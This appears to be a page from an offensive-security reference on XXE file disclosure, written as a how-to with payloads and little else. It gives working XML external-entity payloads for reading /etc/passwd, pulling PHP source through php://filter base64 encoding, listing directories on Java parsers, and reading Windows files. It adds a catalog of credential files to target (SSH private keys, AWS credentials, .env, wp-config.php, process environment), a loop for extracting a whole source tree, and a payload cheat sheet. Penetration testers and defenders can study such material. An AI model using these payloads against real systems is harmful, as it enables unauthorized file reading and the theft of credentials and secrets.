Skip to content

File Disclosure

Once you’ve confirmed external entity resolution works (see Identifying), file disclosure is template-substitution. Two paths depending on what the file contains:

# Path 1 - file:// for plain-text files
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>
# Path 2 - php://filter/ for files that contain XML-breaking characters
# (source code with <, >, &) or binary content
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><name>&xxe;</name></root>
# → response contains base64; decode with `echo '...' | base64 -d`
# Path 3 - Java directory listing
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/">]>
<root><name>&xxe;</name></root>
# → directory contents (Java parsers only)

Success indicator: response body contains the file’s contents (or its base64 encoding) where the entity was referenced.

XML has reserved characters: <, >, &, ", '. When an entity is expanded into XML content, those characters break the parse. The parser either:

  • Errors out (no useful output)
  • Silently truncates at the first reserved character
  • Successfully renders the file because the file contains no reserved characters

/etc/passwd, /etc/hostname, log files, plain-text configs - these typically work with raw file:// because they’re pure ASCII without </>/&. Source code, HTML, XML, config files with embedded shell, and any binary content - these break unless wrapped.

The wrapper of choice for PHP targets is php://filter/convert.base64-encode/ because base64 output is XML-safe by definition (alphanumeric + +, /, = - none are reserved). For non-PHP targets, the CDATA approach in Blind exfil is the alternative.

The textbook payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<name>&xxe;</name>
<email>[email protected]</email>
</root>

Response contains the file:

<message>Thanks root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...</message>

The URL scheme is file:/// with three slashes - file:// is the scheme separator, then a third / for the absolute path root. Some parsers tolerate file:/etc/passwd (one slash) but the three-slash form is portable.

On Windows targets:

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">

Forward slashes work on Windows in file:// URIs. Backslashes work in some parsers but break in others; default to forward slashes.

If /etc/hostname returns fully but /etc/passwd returns only the first line, the parser is choking on something in the file. Two diagnostics:

Terminal window
# Check what the file actually contains at the suspected break point
$ curl http://target/.../?file_disclosure | head -c 200
# If it stops at a < or & character, that's the break

If the file has reserved characters, switch to Path 2.

Path 2 - php://filter wrapper for PHP targets

Section titled “Path 2 - php://filter wrapper for PHP targets”

For PHP-backed apps, the php://filter/ wrapper lets the entity resolver apply a transformation before returning the content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
<name>&xxe;</name>
</root>

Response contains base64:

PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u

Decode:

Terminal window
$ echo 'PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u' | base64 -d
<?php
include __DIR__ . '/config.php';
...
php://filter/<filter-chain>/resource=<file-path>

Filter chain is convert.base64-encode for source-code extraction. Other useful filters:

FilterEffectUse case
convert.base64-encodeBase64 the outputAnything with <, >, &, or binary content
convert.iconv.UTF-8.UTF-16Re-encode UTF-8 to UTF-16Sometimes survives where base64 doesn’t (rare)
zlib.deflate | convert.base64-encodeCompress then base64Large files (chain with `
string.rot13ROT-13Curiosity; not generally useful

Always start with convert.base64-encode - it’s the universal solution.

The resource= value is the path the PHP wrapper opens. Try in order:

PathUsed by
Relative: resource=index.phpWhen the working directory is the webroot - most common
Absolute Linux: resource=/var/www/html/index.phpWhen relative paths fail or you’ve identified the webroot from prior recon
Absolute Windows: resource=c:/inetpub/wwwroot/index.phpWindows targets

Some parsers refuse relative paths in the wrapper - start with absolute when you know the webroot, fall back to relative when you don’t.

If absolute paths require knowing the webroot:

<!-- Often the simplest disclosure -->
<!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">
<!-- Or nginx -->
<!ENTITY xxe SYSTEM "file:///etc/nginx/sites-enabled/default">
<!-- Or via /proc/self -->
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php">

/proc/self/cwd/ is a symlink to the process’s working directory; reading cwd/index.php reads the index.php of whatever the PHP-FPM worker has cwd’d to. Bypasses the “I don’t know where the webroot is” problem entirely on Linux.

Java’s XML parsers historically allowed pointing entities at directories, returning a directory listing rather than a file’s contents:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/">
]>
<root><name>&xxe;</name></root>

Response:

adduser.conf
alternatives/
apache2/
apt/
bash.bashrc
...

Useful when you don’t know what files exist on the system. Listing /, /etc/, /home/, and /var/www/ quickly maps interesting targets.

This only works on Java parsers (and some older non-PHP parsers). PHP returns an error or empty when handed a directory. If you’re on a PHP target, see Identifying for how to detect framework.

The catalog, organized by what you’re trying to accomplish:

FileContents
/etc/passwdUsers (UIDs, home dirs, shells)
/etc/shadowPassword hashes (root-only; usually inaccessible)
/etc/hostnameServer hostname
/etc/hostsLocal DNS overrides
/etc/resolv.confDNS server config
/etc/os-releaseLinux distribution
/etc/issueLogin banner - often shows distro
/proc/versionKernel version
/proc/self/environProcess environment variables - sometimes leaks credentials
/proc/self/cmdlineProcess command line
/proc/self/cwd/Symlink to current working directory
/proc/self/fd/0, /proc/self/fd/1File descriptors (sometimes useful for log access)
FileContents
/etc/apache2/apache2.confApache main config
/etc/apache2/sites-enabled/000-default.confApache vhost config (reveals webroot)
/etc/nginx/nginx.confNginx main config
/etc/nginx/sites-enabled/defaultNginx vhost config
/etc/php/<version>/apache2/php.iniPHP config (reveals enabled modules, including expect)
/usr/local/etc/php/php.iniAlternative PHP config path
FileLikely path
index.php/var/www/html/index.php, /srv/www/index.php, /app/index.php
config.php, db.php, .envDatabase credentials, API keys
wp-config.php (WordPress)/var/www/html/wp-config.php - DB creds, secret keys
application.properties (Spring)/opt/app/application.properties - DB creds
appsettings.json (.NET Core)/var/www/app/appsettings.json
settings.py (Django)/srv/django/myapp/settings.py - SECRET_KEY, DB
manage.py (Django)Reveals project name
FileContents
/home/<user>/.ssh/id_rsaSSH private key - direct lateral movement
/home/<user>/.ssh/authorized_keysConfirms an account, lists trusted keys
/root/.ssh/id_rsaRoot SSH key (usually root-only)
/home/<user>/.bash_historyCommand history - sometimes contains passwords typed inline
/home/<user>/.aws/credentialsAWS access keys
/home/<user>/.docker/config.jsonDocker registry credentials
/var/lib/mysql/mysql.sockMySQL socket - confirms MySQL running
FileContents
c:/windows/win.iniTiny baseline file; proves Windows + file read
c:/windows/system.iniSystem config
c:/boot.iniBoot config (legacy)
c:/windows/system32/drivers/etc/hostsWindows hosts file
c:/inetpub/wwwroot/web.configIIS app config - DB connection strings, machine keys
c:/inetpub/logs/LogFiles/IIS logs (Java-style directory listing)
c:/Users/<user>/.ssh/id_rsaSSH key if installed
c:/Windows/System32/config/SAMHashes (LSASS access required; usually blocked)
FileContents
/.dockerenvPresence proves you’re in a container
/proc/self/cgroupContainer ID and cgroup info
/etc/hostnameContainer hostname (often randomized)
/.docker/config.jsonContainer registry credentials
Environment via /proc/self/environOften contains AWS creds, DB creds, app secrets

Suppose you have an XXE on a PHP contact form and want the app’s source.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
]>
<root><name>&xxe;</name><email>x</email></root>

Response:

Thanks

Empty. The <?php opening tag’s < character broke parsing. Switch to wrapper.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><name>&xxe;</name><email>x</email></root>

Response:

Thanks PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=

Decode:

Terminal window
$ echo 'PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=' | base64 -d
<?php
session_start();
if (isset($_SESSION['uid'])) {
header('Location: /profile.php');
exit;
}
...

The source code is now in hand. Repeat for every PHP file referenced by index.php (include / require statements give you the paths to enumerate next).

Once you have one file, look for include, require, include_once, require_once statements. Each names another file:

include 'config.php';
require_once __DIR__ . '/db.php';
include('/var/www/html/lib/auth.php');

Loop: for each include/require, run the same XXE against the named file. After 3-5 iterations you’ve usually got the entire source tree.

For automation, see Automation - XXEinjector can mass-extract.

Some parsers truncate entity content after a fixed size (libxml has a 10MB default). Large log files or binaries may come back partial. Workarounds:

  • Use a path filter that targets a specific section: php://filter/read=string.toupper/resource=... doesn’t help with size; you’d have to read by offset
  • Use multiple entities chained for offset reading - complex; usually easier to find a smaller file

Reading /etc/shadow typically fails because the PHP-FPM user isn’t root. The error response varies:

  • Empty content (parser silently failed)
  • HTTP 500 with stack trace
  • Original response with empty entity expansion

/etc/shadow is essentially never readable via XXE on a well-configured system. Move on to /home/<user>/.ssh/id_rsa for the same kind of payoff.

<!ENTITY xxe SYSTEM "file:///path/with spaces/file.txt">

Spaces in paths sometimes need URL-encoding:

<!ENTITY xxe SYSTEM "file:///path/with%20spaces/file.txt">

Either may work depending on parser. Try unencoded first; URL-encode if it fails.

The response is gibberish even though the file should be plain text. Possibilities:

  • File is UTF-16 or another encoding; specify in the XML declaration <?xml version="1.0" encoding="UTF-16"?> - rarely needed for Linux text files
  • Parser is wrapping the output in unexpected encoding; try convert.base64-encode and decode manually
TaskPayload
Plain text file<!ENTITY xxe SYSTEM "file:///etc/passwd">
PHP source code<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
Windows file<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
Java directory listing<!ENTITY xxe SYSTEM "file:///etc/">
Find current webroot<!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php"> (Linux only)
Read SSH key<!ENTITY xxe SYSTEM "file:///home/USERNAME/.ssh/id_rsa">
Read process environment<!ENTITY xxe SYSTEM "file:///proc/self/environ">
Read Apache vhost<!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">
Read .env (Laravel, generic)<!ENTITY xxe SYSTEM "file:///var/www/html/.env">
Decode base64 responseecho 'BASE64' | base64 -d
If content truncates at <Switch to php://filter/convert.base64-encode/
If non-PHP targetSee Blind exfil for CDATA wrap
If no reflectionSee Blind exfil for OOB exfil
Recursive source extractionFind include/require in extracted source; loop on named files

For attacks beyond file read (SSRF, RCE via expect, DoS), see RCE and SSRF. For the blind variants when no response reflection is available, see Blind exfil.

Defenses D3-IAA